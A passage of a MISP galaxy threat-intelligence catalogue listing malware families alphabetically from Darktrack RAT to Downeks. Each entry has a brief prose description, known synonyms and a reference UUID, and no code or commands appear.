Metadata key	Value
type	[]

Darktrack RAT

According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access and control over an infected device. The level of control these programs have varies, however, some can allow user-level manipulation of the affected machine.

The functionalities of RATs likewise varies and so does the scope of potential misuse. DarkTrack has a broad range of functions/capabilities, which make this Trojan a highly-dangerous piece of software.

Internal MISP references

UUID fc91803f-610c-4ad5-ba0c-b78d65abc6db which can be used as unique global reference for Darktrack RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkVision RAT

Internal MISP references

UUID a3fbf190-c562-4af0-8d9a-4a610b7a15e4 which can be used as unique global reference for DarkVision RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkVNC

According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. it is can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates in the background silently. Therefore, it is highly likely that the victims may not notice that their systems have been compromised.

Internal MISP references

UUID 302b2b26-9833-4da7-94f5-a7bd152ad40c which can be used as unique global reference for DarkVNC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Daserf

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Daserf.

Known Synonyms
`Muirim`
`Nioupale`

Internal MISP references

UUID 70f6c71f-bc0c-4889-86e3-ef04e5b8415b which can be used as unique global reference for Daserf in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DataExfiltrator

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DataExfiltrator.

Known Synonyms
`FileSender`

Internal MISP references

UUID 96d727c3-bac6-4c7e-8868-b7237df55ecd which can be used as unique global reference for DataExfiltrator in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Datper

Internal MISP references

UUID 827490bf-19b8-4d14-83b3-7da67fbe436c which can be used as unique global reference for Datper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Daxin

Symantec describes this as a malware written as Windows kernel driver, used by China-linked threat actors. The malware has a custom TCP/IP stack and is capable of hijacking connections.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Daxin.

Known Synonyms
`DELIMEAT`

Internal MISP references

UUID 63bf3200-5e7b-4e29-ba1c-6bf834c15459 which can be used as unique global reference for Daxin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DBatLoader

This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DBatLoader.

Known Synonyms
`ModiLoader`
`NatsoLoader`

Internal MISP references

UUID 17e0756b-6cc6-4c25-825c-5fd85c236218 which can be used as unique global reference for DBatLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DBoxAgent

This malware uses DropBox as C&C channel.

Internal MISP references

UUID 407002c1-1781-4d1c-90bb-3d859f5c2943 which can be used as unique global reference for DBoxAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DcDcrypt

Ransomware written in .NET.

Internal MISP references

UUID 6192f006-e1ba-47cb-b388-af82e4435a51 which can be used as unique global reference for DcDcrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DCRat

DCRat is a typical RAT that has been around since at least June 2019.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DCRat.

Known Synonyms
`DarkCrystal RAT`

Internal MISP references

UUID b32ffb50-8ef1-4c78-a71a-bb23089b4de6 which can be used as unique global reference for DCRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DCSrv

A ransomware as used by MosesStaff, built around the DiskCryptor tool.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DCSrv.

Known Synonyms
`DCrSrv`

Internal MISP references

UUID 7b2609aa-fc3f-4693-a3f1-da4cac77490c which can be used as unique global reference for DCSrv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DDKeylogger

Internal MISP references

UUID 78796a09-cac4-47fc-9e31-9f2ff5b8e377 which can be used as unique global reference for DDKeylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DDKONG

Internal MISP references

UUID cae8384d-b01b-4f9c-a31b-f693e12ea6b2 which can be used as unique global reference for DDKONG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DEADWOOD

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEADWOOD.

Known Synonyms
`Agrius`
`DETBOSIT`
`SQLShred`

Internal MISP references

UUID b3ce3d4d-f115-4bd0-8d30-2b63e060b286 which can be used as unique global reference for DEADWOOD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DealPly

Internal MISP references

UUID 4f32b912-59a9-4dae-9118-28d78e01fbfc which can be used as unique global reference for DealPly in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

dearcry

According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular dearcry.

Known Synonyms
`DoejoCrypt`

Internal MISP references

UUID 793f0f9d-fc1c-43e1-9010-2052a1cf696d which can be used as unique global reference for dearcry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeathRansom

Also known as Wacatac ransomware due to its .wctc extension.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DeathRansom.

Known Synonyms
`deathransom`
`wacatac`

Internal MISP references

UUID 2bc6623a-d7d6-48fc-af79-647648f455aa which can be used as unique global reference for DeathRansom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DECAF

Ransomware written in Go.

Internal MISP references

UUID c70e97ea-73bb-4342-a8cd-6cbe0e589bec which can be used as unique global reference for DECAF in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Decebal

Internal MISP references

UUID fba088fb-2659-48c3-921b-12c6791e6d58 which can be used as unique global reference for Decebal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeepCreep

Internal MISP references

UUID a29e21f9-b193-4369-8351-95860d56de03 which can be used as unique global reference for DeepCreep in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeepRAT

Internal MISP references

UUID 355ace5a-ae57-45b8-b49d-e3286c4c18cc which can be used as unique global reference for DeepRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Defray

Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.

The distribution of Defray has several notable characteristics: According to Proofpoint: " Defray is currently being spread via Microsoft Word document attachments in email The campaigns are as small as several messages each The lures are custom crafted to appeal to the intended set of potential victims The recipients are individuals or distribution lists, e.g., group@ and websupport@ Geographic targeting is in the UK and US Vertical targeting varies by campaign and is narrow and selective "

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Defray.

Known Synonyms
`Glushkov`

Internal MISP references

UUID bbc6dbe3-0ade-4b80-a1cb-c19e23ea8b88 which can be used as unique global reference for Defray in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Deimos

Described by Elastic as being associated with win.jupyter, and being used in the context of initial access, persistence, and C&C capabilities.

Internal MISP references

UUID e369e45e-0e92-4811-822e-5e598285465e which can be used as unique global reference for Deimos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeimosC2

Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully-functional framework that allows for multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 will generate the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors will gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.

Internal MISP references

UUID 1f1a894f-7a1b-4b98-9280-d33cf884a539 which can be used as unique global reference for DeimosC2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeliveryCheck

According to CERT-UA, this malware makes use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking. Its specificity is the presence of a server part, which is usually installed on compromised MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool), effectively turning a legitimate server into a malware control center.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DeliveryCheck.

Known Synonyms
`CAPIBAR`
`GAMEDAY`

Internal MISP references

UUID 73ef709e-c88d-4737-a3fb-81d7ece5c97d which can be used as unique global reference for DeliveryCheck in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Delta(Alfa,Bravo, ...)

Internal MISP references

UUID 0be67307-670d-4558-bcf7-1387047bca4b which can be used as unique global reference for Delta(Alfa,Bravo, ...) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas - webarchive

Associated metadata

Metadata key	Value
type	[]

DeltaStealer

Rust-based infostealer.

Internal MISP references

UUID 3b38cd03-a387-43ce-b8d9-c337d51a84d0 which can be used as unique global reference for DeltaStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dented

Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.

Internal MISP references

UUID 0404cb3e-1390-4010-a368-80ee585ddd59 which can be used as unique global reference for Dented in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.dented - webarchive

Associated metadata

Metadata key	Value
type	[]

Deprimon

According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.

DePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.

Internal MISP references

UUID 17429ed4-6106-4a28-9a76-f19cd476d94b which can be used as unique global reference for Deprimon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeputyDog

Internal MISP references

UUID ff4254e5-f301-4804-9a0f-e010af56576c which can be used as unique global reference for DeputyDog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeriaLock

Internal MISP references

UUID 52e0bcba-e352-4d7b-82ee-9169f18dca5a which can be used as unique global reference for DeriaLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DeroHE

DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.

Internal MISP references

UUID d348373e-df43-4916-ac23-4f6e344c59e1 which can be used as unique global reference for DeroHE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Derusbi (Windows)

A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Derusbi (Windows).

Known Synonyms
`PHOTO`

Internal MISP references

UUID 7ea00126-add3-407e-b69d-d4aa1b3049d5 which can be used as unique global reference for Derusbi (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DesertBlade

According to Microsoft, this was used in a limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller).

Internal MISP references

UUID 9a23d11d-1a32-47c8-a35e-accb88a2a370 which can be used as unique global reference for DesertBlade in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Devil's Rat

Internal MISP references

UUID 44168d77-338d-46ad-a5f6-c17c2b6b0631 which can be used as unique global reference for Devil's Rat in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat - webarchive

Associated metadata

Metadata key	Value
type	[]

DevOpt

Internal MISP references

UUID 7d7a870d-725f-4ea3-b344-9c1ad0500618 which can be used as unique global reference for DevOpt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dexbia

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dexbia.

Known Synonyms
`CONIME`

Internal MISP references

UUID 4792fe0d-5c2f-44b1-861a-4b0501ccd335 which can be used as unique global reference for Dexbia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dexphot

Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.

Internal MISP references

UUID b9f6de53-13b3-4246-96d5-010851c75bdb which can be used as unique global reference for Dexphot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dexter

Dexter is a computer virus or point of sale malware which infects computers running Microsoft Windows and was discovered by IT security firm Seculert, in December 2012. It infects PoS systems worldwide and steals sensitive information such as Credit Card and Debit Card information.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dexter.

Known Synonyms
`LusyPOS`

Internal MISP references

UUID f44e6d03-54c0-47af-b228-0040299c349c which can be used as unique global reference for Dexter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dharma

According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.

Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dharma.

Known Synonyms
`Arena`
`Crysis`
`Wadhrama`
`ncov`

Internal MISP references

UUID 9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef which can be used as unique global reference for Dharma in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DiamondFox

According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.

Once purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.

DiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DiamondFox.

Known Synonyms
`Crystal`
`Gorynch`
`Gorynych`

Internal MISP references

UUID 7368ab0c-ef4b-4f53-a746-f150b8afa665 which can be used as unique global reference for DiamondFox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Diavol

A ransomware with potential ties to Wizard Spider.

Internal MISP references

UUID 6fa944af-3def-437a-8a52-9234782b5bb8 which can be used as unique global reference for Diavol in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DICELOADER

A RAT written in .NET, used by FIN7 since 2021. In some instances dropped by ps1.powertrash.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DICELOADER.

Known Synonyms
`Lizar`

Internal MISP references

UUID f8e7673a-c8dc-406a-851e-48756074b5c6 which can be used as unique global reference for DICELOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DILLJUICE

APT10's fork of the (open-source) Quasar RAT.

Internal MISP references

UUID 81c95462-62ba-4182-bba0-707e1f6cc1eb which can be used as unique global reference for DILLJUICE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DilongTrash

Downloader.

Internal MISP references

UUID 8d910ebf-131b-452c-8cc2-0226887259a0 which can be used as unique global reference for DilongTrash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dimnie

Internal MISP references

UUID 8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5 which can be used as unique global reference for Dimnie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DinodasRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DinodasRAT.

Known Synonyms
`XDealer`

Internal MISP references

UUID a8eaa325-3e89-41af-9de0-ae2c992148a5 which can be used as unique global reference for DinodasRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DinoTrain

Downloader.

Internal MISP references

UUID 8f4c0f4a-4b3f-4bce-be08-fabf4ec45399 which can be used as unique global reference for DinoTrain in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DirCrypt

Internal MISP references

UUID 61b2dd12-2381-429d-bb64-e3210804a462 which can be used as unique global reference for DirCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DirtyMoe

Internal MISP references

UUID 9f324aaf-a54e-4532-bfc1-b23f1a77abbf which can be used as unique global reference for DirtyMoe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Disk Knight

Internal MISP references

UUID 1e5d8ec2-e609-482d-93ef-8a0ab74b3da5 which can be used as unique global reference for Disk Knight in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DispCashBR

Internal MISP references

UUID 9e343fd7-3809-49af-9903-db7daeac339b which can be used as unique global reference for DispCashBR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DispenserXFS

Internal MISP references

UUID 3bbf08fd-f147-4b23-9d48-a53ac836bc05 which can be used as unique global reference for DispenserXFS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DistTrack

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DistTrack.

Known Synonyms
`Shamoon`

Internal MISP references

UUID 25d03501-1fe0-4d5e-bc75-c00fbdaa83df which can be used as unique global reference for DistTrack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Divergent

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Divergent.

Known Synonyms
`Novter`

Internal MISP references

UUID 7ca1e2ad-6cf4-44cc-8559-2f71e4fb2801 which can be used as unique global reference for Divergent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Diztakun

Internal MISP references

UUID 5e73185c-6070-45ed-88de-ed75580582eb which can be used as unique global reference for Diztakun in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dizzyvoid

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dizzyvoid.

Known Synonyms
`Errorroot`

Internal MISP references

UUID ca45c584-bce5-4b8b-87df-a2919128db55 which can be used as unique global reference for Dizzyvoid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DLRAT

Internal MISP references

UUID b3f0f3a8-a50e-457b-a5dc-e17110ccac2f which can be used as unique global reference for DLRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DMA Locker

Internal MISP references

UUID 1248cdf7-4180-4098-b1d0-389aa523a0ed which can be used as unique global reference for DMA Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DMSniff

DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.

Internal MISP references

UUID f716681e-c1fd-439a-83aa-3147bb9f082f which can be used as unique global reference for DMSniff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DneSpy

DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.

Internal MISP references

UUID 7c35d10d-b3da-459e-a272-da2ea7cee4c2 which can be used as unique global reference for DneSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DNSChanger

Internal MISP references

UUID 92db05a0-7d7e-40c3-94c8-ce3cd5e36daa which can be used as unique global reference for DNSChanger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DNSMessenger

DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSMessenger.

Known Synonyms
`TEXTMATE`

Internal MISP references

UUID b376580e-aba1-4ac9-9c2d-2df429efecf6 which can be used as unique global reference for DNSMessenger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DNSpionage

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSpionage.

Known Synonyms
`Agent Drable`
`AgentDrable`
`Webmask`

Internal MISP references

UUID ef46bd90-91d0-4208-b3f7-08b65acb8438 which can be used as unique global reference for DNSpionage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

dnWipe

Internal MISP references

UUID 0f6c16ec-e15c-480b-a5d3-cf5efe71821a which can be used as unique global reference for dnWipe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DogHousePower

DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DogHousePower.

Known Synonyms
`Shelma`

Internal MISP references

UUID 14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13 which can be used as unique global reference for DogHousePower in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Minodo

Since late February 2023, Minodo Backdoor campaigns have been employed to deliver either the Project Nemesis information stealer or more sophisticated backdoors like Cobalt Strike. This backdoor collects basic system information, which it then transmits to the C2 server. In return, it receives an AES-encrypted payload. Notably, the Minodo Backdoor is designed to contact a different C2 address for domain-joined systems. This suggests that more capable backdoors, such as Cobalt Strike, are downloaded on higher-value targets instead of Project Nemesis.

Internal MISP references

UUID 37169b2f-344e-4913-ab91-d447d597ffa7 which can be used as unique global reference for Minodo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Donex

Internal MISP references

UUID 2dcf3b68-9dd0-4e49-86ba-39f05599033d which can be used as unique global reference for Donex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DONOT

Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.

Internal MISP references

UUID 6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc which can be used as unique global reference for DONOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

donut_injector

Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42). Github: https://github.com/TheWover/donut

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular donut_injector.

Known Synonyms
`Donut`

Internal MISP references

UUID d713f337-b9c7-406d-88e4-3352b2523c73 which can be used as unique global reference for donut_injector in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoorMe

Internal MISP references

UUID b91e1d34-cabd-404f-84d2-51a4f9840ffb which can be used as unique global reference for DoorMe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DOPLUGS

Internal MISP references

UUID def463e0-0664-46aa-9888-d92380a4eebc which can be used as unique global reference for DOPLUGS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoppelDridex

DoppelDridex is a fork of Indrik Spider's Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.

Internal MISP references

UUID b634a2ac-da01-43c0-b823-a235497a10a8 which can be used as unique global reference for DoppelDridex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoppelPaymer

Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: ".how2decrypt.txt".

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoppelPaymer.

Known Synonyms
`Pay OR Grief`

Internal MISP references

UUID 16a76dcf-92cb-4371-8440-d6b3adbb081b which can be used as unique global reference for DoppelPaymer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NgrBot

Internal MISP references

UUID 91191c0a-96d8-40b8-b8fb-daa0ad009c87 which can be used as unique global reference for NgrBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dorshel

Internal MISP references

UUID d3b5a884-1fd6-4cc4-9837-7d8ee8817711 which can be used as unique global reference for Dorshel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dosia

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dosia.

Known Synonyms
`DDOSIA`

Internal MISP references

UUID eabd30ed-d2ec-43b5-b790-7381f93a3a03 which can be used as unique global reference for Dosia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DOSTEALER

According to Mandiant, DOSTEALER is a dataminer that mines browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.

Internal MISP references

UUID 3b4bf82d-5c57-4ea2-847d-f2fd292ba730 which can be used as unique global reference for DOSTEALER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dot Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dot Ransomware.

Known Synonyms
`MZP Ransomware`

Internal MISP references

UUID fc63c3ea-23ed-448d-9d66-3fb87ebea4ba which can be used as unique global reference for Dot Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DOUBLEBACK

DOUBLEBACK is a newly discovered fileless malware deployed as part of an attack campaign that took place in December 2020. The threat actors responsible for the operations are tracked as UNC2529 by researchers. According to their findings, DOUBLEBACK is the final payload delivered onto the compromised systems. Its task is to establish and maintain a backdoor on the victim's machine.

Internal MISP references

UUID 1cda1810-f705-4d6b-9c9e-f509f8c7f5c5 which can be used as unique global reference for DOUBLEBACK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleFantasy (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoubleFantasy (Windows).

Known Synonyms
`VALIDATOR`

Internal MISP references

UUID 46a523ca-be25-4f59-bc01-2c006c58bf80 which can be used as unique global reference for DoubleFantasy (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleFinger

Internal MISP references

UUID 4f1e5142-0f62-48ee-a4a7-d8072fd78dcf which can be used as unique global reference for DoubleFinger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoublePulsar

Internal MISP references

UUID 32984744-c0f9-43f7-bfca-c3276248a4fa which can be used as unique global reference for DoublePulsar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DoubleZero

A wiper identified by CERT-UA on March 17th, written in C#.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DoubleZero.

Known Synonyms
`FiberLake`

Internal MISP references

UUID 7b4234ff-a7c2-4991-b4bf-6e13c57103cd which can be used as unique global reference for DoubleZero in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Downdelph

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Downdelph.

Known Synonyms
`DELPHACY`

Internal MISP references

UUID e6a077cb-42cc-4193-9006-9ceda8c0dff2 which can be used as unique global reference for Downdelph in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Downeks

Internal MISP references

